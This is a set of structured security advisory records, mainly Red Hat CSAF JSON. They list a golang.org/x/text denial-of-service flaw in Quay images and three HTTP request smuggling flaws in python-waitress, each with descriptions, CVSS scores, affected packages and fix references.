"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "python-pillow: out-of-bounds reads/writes in the parsing of SGI image files in expandrow/expandrow2"
},
{
"cve": "CVE-2020-14040",
"cwe": {
"id": "CWE-835",
"name": "Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)"
},
"discovery_date": "2020-06-17T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1853652"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service vulnerability was found in the golang.org/x/text library. A library or application must use one of the vulnerable functions, such as unicode.Transform, transform.String, or transform.Byte, to be susceptible to this vulnerability. If an attacker is able to supply specific characters or strings to the vulnerable application, there is the potential to cause an infinite loop to occur using more memory, resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "* OpenShift ServiceMesh (OSSM) 1.0 is Out Of Support Scope (OOSS) for Moderate and Low impact vulnerabilities. Jaeger was packaged with ServiceMesh in 1.0, and hence is also marked OOSS, but the Jaeger-Operator is a standalone product and is affected by this vulnerability.\n\n* Because Service Telemetry Framework does not directly use unicode.UTF16, no update will be provided at this time for STF\u0027s sg-core-container.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2020-14040"
},
{
"category": "external",
"summary": "RHBZ#1853652",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1853652"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2020-14040",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14040"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-14040",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-14040"
},
{
"category": "external",
"summary": "https://github.com/golang/go/issues/39491",
"url": "https://github.com/golang/go/issues/39491"
},
{
"category": "external",
"summary": "https://groups.google.com/forum/#!topic/golang-announce/bXVeAmGOqz0",
"url": "https://groups.google.com/forum/#!topic/golang-announce/bXVeAmGOqz0"
}
],
"release_date": "2020-06-17T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-02-04T16:14:00+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:0420"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-Quay-3:quay/clair-rhel8@sha256:32d29a9bc9e6f4690d75b432bc36de8555828c7ecabe405f50add88140a13b2d_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-bundle@sha256:cc204e9e439a64232673f7b3c1071ce7d1eee16c0f101688b276aa30eda55b06_amd64",
"8Base-Quay-3:quay/quay-bridge-operator-rhel8@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-builder-qemu-rhcos-rhel8@sha256:324e4fd85bad0dd77f351b1c946040b0be639a63b4f90150e42739efde98a21c_amd64",
"8Base-Quay-3:quay/quay-builder-rhel8@sha256:afc774b0aa286a1a72143ae0ae3491dc6f6005b487bac20c10495c8d98b82165_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-bundle@sha256:70581e0c0ff015d0cb09caeb0e7d76714cd7903df04ae428003c3f8dc3fdb4a3_amd64",
"8Base-Quay-3:quay/quay-container-security-operator-rhel8@sha256:c3642669da261c8a7ee458fcba98abde522bf51e8695c30077840c787abc987e_amd64",
"8Base-Quay-3:quay/quay-openshift-bridge-rhel8-operator@sha256:74af7b3f0fdd7c72395eb4628ded5c38f098bf11bccc5cfba2f4c5698911246c_amd64",
"8Base-Quay-3:quay/quay-operator-bundle@sha256:87a68e36f451d24a493f25a2302897f7009ed7742e405e8e45988837c8b9c7f4_amd64",
"8Base-Quay-3:quay/quay-operator-rhel8@sha256:7bf688be0d6a587c14316c6df81b3a59dba8c308842b67d016bedaedfad95c98_amd64",
"8Base-Quay-3:quay/quay-rhel8@sha256:bdded901debc402b5e5b85bfd3476cc9feda213b846abb2d3ca91d6d91acb34f_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash"
}
]
}
rhsa-2020_0720
Vulnerability from csaf_redhat
Published
2020-03-05 12:02
Modified
2024-11-13 22:11
Summary
Red Hat Security Advisory: python-waitress security update
Notes
Topic
An update for python-waitress is now available for Red Hat OpenStack
Platform 15 (Stein).
Red Hat Product Security has rated this update as having a security impact
of Low. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available for each vulnerability
from the CVE link(s) in the References section.
Details
Waitress is a pure Python WSGI server which supports HTTP/1.0 and HTTP/1.1.
Security Fix(es):
* HTTP request smuggling through LF vs CRLF handling (CVE-2019-16785)
* HTTP request smuggling through invalid Transfer-Encoding (CVE-2019-16786)
* HTTP Request Smuggling through Invalid whitespace characters in headers
(CVE-2019-16789)
For more details about the security issue(s), including the impact, a CVSS
score, acknowledgments, and other related information, refer to the CVE
page listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Low"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update for python-waitress is now available for Red Hat OpenStack\nPlatform 15 (Stein).\n\nRed Hat Product Security has rated this update as having a security impact\nof Low. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Waitress is a pure Python WSGI server which supports HTTP/1.0 and HTTP/1.1.\n\nSecurity Fix(es):\n\n* HTTP request smuggling through LF vs CRLF handling (CVE-2019-16785)\n\n* HTTP request smuggling through invalid Transfer-Encoding (CVE-2019-16786)\n\n* HTTP Request Smuggling through Invalid whitespace characters in headers\n(CVE-2019-16789)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2020:0720",
"url": "https://access.redhat.com/errata/RHSA-2020:0720"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#low",
"url": "https://access.redhat.com/security/updates/classification/#low"
},
{
"category": "external",
"summary": "1789807",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1789807"
},
{
"category": "external",
"summary": "1791415",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1791415"
},
{
"category": "external",
"summary": "1791420",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1791420"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2020/rhsa-2020_0720.json"
}
],
"title": "Red Hat Security Advisory: python-waitress security update",
"tracking": {
"current_release_date": "2024-11-13T22:11:30+00:00",
"generator": {
"date": "2024-11-13T22:11:30+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.0"
}
},
"id": "RHSA-2020:0720",
"initial_release_date": "2020-03-05T12:02:14+00:00",
"revision_history": [
{
"date": "2020-03-05T12:02:14+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2020-03-05T12:02:14+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-11-13T22:11:30+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat OpenStack Platform 15.0",
"product": {
"name": "Red Hat OpenStack Platform 15.0",
"product_id": "8Base-RHOS-15.0",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openstack:15::el8"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenStack Platform"
},
{
"branches": [
{
"category": "product_version",
"name": "python-waitress-0:1.4.2-1.el8ost.src",
"product": {
"name": "python-waitress-0:1.4.2-1.el8ost.src",
"product_id": "python-waitress-0:1.4.2-1.el8ost.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python-waitress@1.4.2-1.el8ost?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "python3-waitress-0:1.4.2-1.el8ost.noarch",
"product": {
"name": "python3-waitress-0:1.4.2-1.el8ost.noarch",
"product_id": "python3-waitress-0:1.4.2-1.el8ost.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3-waitress@1.4.2-1.el8ost?arch=noarch"
}
}
}
],
"category": "architecture",
"name": "noarch"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "python-waitress-0:1.4.2-1.el8ost.src as a component of Red Hat OpenStack Platform 15.0",
"product_id": "8Base-RHOS-15.0:python-waitress-0:1.4.2-1.el8ost.src"
},
"product_reference": "python-waitress-0:1.4.2-1.el8ost.src",
"relates_to_product_reference": "8Base-RHOS-15.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-waitress-0:1.4.2-1.el8ost.noarch as a component of Red Hat OpenStack Platform 15.0",
"product_id": "8Base-RHOS-15.0:python3-waitress-0:1.4.2-1.el8ost.noarch"
},
"product_reference": "python3-waitress-0:1.4.2-1.el8ost.noarch",
"relates_to_product_reference": "8Base-RHOS-15.0"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2019-16785",
"cwe": {
"id": "CWE-444",
"name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)"
},
"discovery_date": "2020-01-15T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1791420"
}
],
"notes": [
{
"category": "description",
"text": "An HTTP-request vulnerability was discovered in Waitress which implemented a \"MAY\" part of the RFC7230 which states: \"Although the line terminator for the start-line and header fields is the sequence CRLF, a recipient MAY recognize a single LF as a line terminator and ignore any preceding CR.\" Unfortunately, if a front-end server does not process header fields with an LF the same way as it processes those with a CRLF, it can lead to the front-end and the back-end server processing the same HTTP message in two different ways. This vulnerability can lead to a potential for HTTP request smuggling and splitting where Waitress may see two requests, while the front-end server only sees a single HTTP message.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "waitress: HTTP request smuggling through LF vs CRLF handling",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "All affected Red Hat products ship but do not use the flawed version of python-waitress. The impact for these products is therefore rated as having a security impact of Low.\n\nIn Red Hat OpenStack Platform 13, because the flawed code is not used and the fix would require a substantial amount of development, no update will be provided at this time for the RHOSP13 python-waitress package.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOS-15.0:python-waitress-0:1.4.2-1.el8ost.src",
"8Base-RHOS-15.0:python3-waitress-0:1.4.2-1.el8ost.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2019-16785"
},
{
"category": "external",
"summary": "RHBZ#1791420",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1791420"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2019-16785",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-16785"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2019-16785",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16785"
},
{
"category": "external",
"summary": "https://docs.pylonsproject.org/projects/waitress/en/latest/#id6",
"url": "https://docs.pylonsproject.org/projects/waitress/en/latest/#id6"
}
],
"release_date": "2019-12-20T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2020-03-05T12:02:14+00:00",
"details": "For details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOS-15.0:python-waitress-0:1.4.2-1.el8ost.src",
"8Base-RHOS-15.0:python3-waitress-0:1.4.2-1.el8ost.noarch"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2020:0720"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:L/A:N",
"version": "3.1"
},
"products": [
"8Base-RHOS-15.0:python-waitress-0:1.4.2-1.el8ost.src",
"8Base-RHOS-15.0:python3-waitress-0:1.4.2-1.el8ost.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "waitress: HTTP request smuggling through LF vs CRLF handling"
},
{
"cve": "CVE-2019-16786",
"cwe": {
"id": "CWE-444",
"name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)"
},
"discovery_date": "2020-01-15T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1791415"
}
],
"notes": [
{
"category": "description",
"text": "An HTTP-interpretation flaw was found in waitress which did not properly validate incoming HTTP headers. When parsing the Transfer-Encoding header, waitress would look only for a single string value. According to the HTTP standard, Transfer-Encoding should be a comma-separated list, with the inner-most encoding first, followed by any further transfer codings, ending with \u0027chunked\u0027. Because of this flaw, requests sent with: \"Transfer-Encoding: gzip, chunked\" would get ignored, and waitress would use the Content-Length header instead to determine the body size of the HTTP message. A remote attacker could exploit this flaw to force waitress to accept potentially bad HTTP requests or treat a single request as multiple requests in the case of HTTP pipelining.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "waitress: HTTP request smuggling through invalid Transfer-Encoding",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "All affected Red Hat products ship but do not use the flawed version of python-waitress. The impact for these products is therefore rated as having a security impact of Low.\n\nIn Red Hat OpenStack Platform 13, because the flawed code is not used and the fix would require a substantial amount of development, no update will be provided at this time for the RHOSP13 python-waitress package.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOS-15.0:python-waitress-0:1.4.2-1.el8ost.src",
"8Base-RHOS-15.0:python3-waitress-0:1.4.2-1.el8ost.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2019-16786"
},
{
"category": "external",
"summary": "RHBZ#1791415",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1791415"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2019-16786",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-16786"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2019-16786",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16786"
},
{
"category": "external",
"summary": "https://docs.pylonsproject.org/projects/waitress/en/latest/#id6",
"url": "https://docs.pylonsproject.org/projects/waitress/en/latest/#id6"
}
],
"release_date": "2019-12-20T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2020-03-05T12:02:14+00:00",
"details": "For details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOS-15.0:python-waitress-0:1.4.2-1.el8ost.src",
"8Base-RHOS-15.0:python3-waitress-0:1.4.2-1.el8ost.noarch"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2020:0720"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:L/A:N",
"version": "3.1"
},
"products": [
"8Base-RHOS-15.0:python-waitress-0:1.4.2-1.el8ost.src",
"8Base-RHOS-15.0:python3-waitress-0:1.4.2-1.el8ost.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "waitress: HTTP request smuggling through invalid Transfer-Encoding"
},
{
"cve": "CVE-2019-16789",
"cwe": {
"id": "CWE-444",
"name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)"
},
"discovery_date": "2019-12-26T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1789807"
}
],
"notes": [
{
"category": "description",
"text": "An HTTP-interpretation flaw was found in waitress, through version 1.4.0. If a proxy server is used in front of waitress, an invalid request may be sent by an attacker that bypasses the front-end and is parsed differently by waitress leading to a potential for HTTP request smuggling. Specially crafted requests containing special whitespace characters in the Transfer-Encoding header would get parsed by waitress as being a chunked request, but a front-end server would use the Content-Length instead as the Transfer-Encoding header is considered invalid due to containing invalid characters. If a front-end server does HTTP pipelining to a backend Waitress server, an HTTP request splitting could occur which may lead to potential cache poisoning or unexpected information disclosure. This issue is fixed in Waitress 1.4.1 through more strict HTTP field validation. The highest threat from this vulnerability is data integrity.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "waitress: HTTP Request Smuggling through Invalid whitespace characters in headers",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "All affected Red Hat products ship but do not use the flawed version of python-waitress. The impact for these products is therefore rated as having a security impact of Low.\n\nFor Red Hat OpenStack Platform 13, because the flaw has a lower impact and the fix would require a substantial amount of development, no update will be provided at this time for the RHOSP13 python-waitress package.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOS-15.0:python-waitress-0:1.4.2-1.el8ost.src",
"8Base-RHOS-15.0:python3-waitress-0:1.4.2-1.el8ost.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2019-16789"
},
{
"category": "external",
"summary": "RHBZ#1789807",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1789807"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2019-16789",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-16789"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2019-16789",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16789"
},
{
"category": "external",
"summary": "https://docs.pylonsproject.org/projects/waitress/en/latest/#id2",
"url": "https://docs.pylonsproject.org/projects/waitress/en/latest/#id2"
}
],
"release_date": "2019-12-26T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2020-03-05T12:02:14+00:00",
"details": "For details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOS-15.0:python-waitress-0:1.4.2-1.el8ost.src",
"8Base-RHOS-15.0:python3-waitress-0:1.4.2-1.el8ost.noarch"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2020:0720"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N",
"version": "3.1"
},
"products": [
"8Base-RHOS-15.0:python-waitress-0:1.4.2-1.el8ost.src",
"8Base-RHOS-15.0:python3-waitress-0:1.4.2-1.el8ost.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "waitress: HTTP Request Smuggling through Invalid whitespace characters in headers"
}
]
}
gsd-2019-16789
Vulnerability from gsd
Modified
2023-12-13 01:23
Details
In Waitress through version 1.4.0, if a proxy server is used in front of waitress, an invalid request may be sent by an attacker that bypasses the front-end and is parsed differently by waitress leading to a potential for HTTP request smuggling. Specially crafted requests containing special whitespace characters in the Transfer-Encoding header would get parsed by Waitress as being a chunked request, but a front-end server would use the Content-Length instead as the Transfer-Encoding header is considered invalid due to containing invalid characters. If a front-end server does HTTP pipelining to a backend Waitress server this could lead to HTTP request splitting which may lead to potential cache poisoning or unexpected information disclosure. This issue is fixed in Waitress 1.4.1 through more strict HTTP field validation.
Aliases
Aliases
{
"GSD": {
"alias": "CVE-2019-16789",
"description": "In Waitress through version 1.4.0, if a proxy server is used in front of waitress, an invalid request may be sent by an attacker that bypasses the front-end and is parsed differently by waitress leading to a potential for HTTP request smuggling. Specially crafted requests containing special whitespace characters in the Transfer-Encoding header would get parsed by Waitress as being a chunked request, but a front-end server would use the Content-Length instead as the Transfer-Encoding header is considered invalid due to containing invalid characters. If a front-end server does HTTP pipelining to a backend Waitress server this could lead to HTTP request splitting which may lead to potential cache poisoning or unexpected information disclosure. This issue is fixed in Waitress 1.4.1 through more strict HTTP field validation.",
"id": "GSD-2019-16789",
"references": [
"https://www.suse.com/security/cve/CVE-2019-16789.html",
"https://access.redhat.com/errata/RHSA-2021:0420",
"https://access.redhat.com/errata/RHSA-2020:0720",
"https://advisories.mageia.org/CVE-2019-16789.html"
]
},
"gsd": {
"metadata": {
"exploitCode": "unknown",
"remediation": "unknown",
"reportConfidence": "confirmed",
"type": "vulnerability"
},
"osvSchema": {
"aliases": [
"CVE-2019-16789"
],
"details": "In Waitress through version 1.4.0, if a proxy server is used in front of waitress, an invalid request may be sent by an attacker that bypasses the front-end and is parsed differently by waitress leading to a potential for HTTP request smuggling. Specially crafted requests containing special whitespace characters in the Transfer-Encoding header would get parsed by Waitress as being a chunked request, but a front-end server would use the Content-Length instead as the Transfer-Encoding header is considered invalid due to containing invalid characters. If a front-end server does HTTP pipelining to a backend Waitress server this could lead to HTTP request splitting which may lead to potential cache poisoning or unexpected information disclosure. This issue is fixed in Waitress 1.4.1 through more strict HTTP field validation.",
"id": "GSD-2019-16789",
"modified": "2023-12-13T01:23:40.404107Z",
"schema_version": "1.4.0"
}
},
"namespaces": {
"cve.org": {
"CVE_data_meta": {
"ASSIGNER": "security-advisories@github.com",
"ID": "CVE-2019-16789",
"STATE": "PUBLIC",
"TITLE": "HTTP Request Smuggling in Waitress: Invalid whitespace characters in headers"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
